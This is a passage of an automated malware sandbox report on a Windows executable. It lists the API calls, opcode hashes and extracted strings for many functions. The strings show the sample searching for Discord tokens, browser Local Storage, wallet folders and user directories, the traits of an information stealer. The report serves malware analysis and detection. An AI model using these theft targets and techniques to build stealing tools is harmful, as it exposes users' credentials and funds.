                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                • Opcode ID: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                • Instruction ID: 15d096accc25870f1c61d4fec85a6e9edf64df49f5c63818c5a2d69bf229bf11
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAF030756443406BD2209B18DC85B6BB7A9EFC4755F00882DF68957381C6349C1586A6
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                • Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                • Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SHFileOperationA.SHELL32(?), ref: 00411F94
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileOperation
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                                • Opcode ID: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                                • Instruction ID: dccbb589212da41187320816474e935ed05e6db7b62261ff46e18f4692dac182
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE07EB0608301ABE300DF46D55970BBBE0EB98308F40885DF0948B250D3B9C69C8B9B
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heapmemcmpstrlen$??3@AllocFileFindFirstProcessmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                • API String ID: 2833195460-599946814
                                                                                                                                                                                                                                                                                • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040BC5A
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0040BC6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040BCFE
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040BD2F
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040BD8B
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BDBC
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BE1F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\*.*$.metadata-v2$C:\ProgramData\$PSk?$Plugins$Ph=$Wallets$W<?$\storage\default\$%@$+Q$N=$P>$V=$X>$]=$_>$d=$x>
                                                                                                                                                                                                                                                                                • API String ID: 3353021899-1404224526
                                                                                                                                                                                                                                                                                • Opcode ID: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                • Instruction ID: db501d22f0f1181e2ce2af52b6c83326310b215b830042a06cc2d5eef77a8b05
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86425231A102189BDF04EBA1C9D59FE7769AF44308F4040AEF9066B192DF7CADC5C7A9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041DDB9
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 0041DECA
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 0041DEE8
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandlelstrcpy
                                                                                                                                                                                                                                                                                • String ID: UT
                                                                                                                                                                                                                                                                                • API String ID: 3205445448-894488996
                                                                                                                                                                                                                                                                                • Opcode ID: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                • Instruction ID: ac4f865b8f17060690429e4fd138a7650e313cba3034da994fc339625156bd58
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C12D2B5A087809FD721DF26C48479BBBE1AF95308F14482EE8C687352D738D985CB5A
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                                • Opcode ID: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?,771AF360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                • Opcode ID: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                • Instruction ID: 1e243eb0cc245641358f316f4ded0038930a38816da4ddb4eced82cb662ad228
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29E04F363013149BC6208B89ECC5D57BBAAEB8D7F4B5A4172EA045B326D275AC50CA64
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                • Instruction ID: 81a96ac3c5c45741fb44ce0365675c3fdd34da691af61be43d7ddf4b7eb2458a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59224CB57062998FCB35CF99C9805E9B7A2BF8A310F14852EDC4D8B351C734AA47DB42
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                • Instruction ID: 0d88d1c80d5cf604edfe207e3e975c6923d32c25b21c0e4bf53f94e4bddbbc5c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E18DB1B06A56ABC30A9F79C4805E5F7A5FF4A309B04832EE86C53242D7347467CBC6
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                • Instruction ID: 4cfa1d93c302992564cd6e5d5855d4dbd855d3a9678cd46773ae9a1c723c4c6d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD1F975A253118BDB02DFB8C8C05D577A6AF96341B08C37EEC487F20BE738A4428B56
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                • Instruction ID: eb1f8b5bbe8e890cce5985e8088739ae93b1079bd2bcff990eab828ac5c7b9b1
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A431C330D740B049C7809F39C8949E77BE2DB8B206FAD86A7D5D147583D319C64BEB25
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$Process$Free$Alloc$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2961803143-0
                                                                                                                                                                                                                                                                                • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00412EC4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                • API String ID: 348468850-2422389115
                                                                                                                                                                                                                                                                                • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
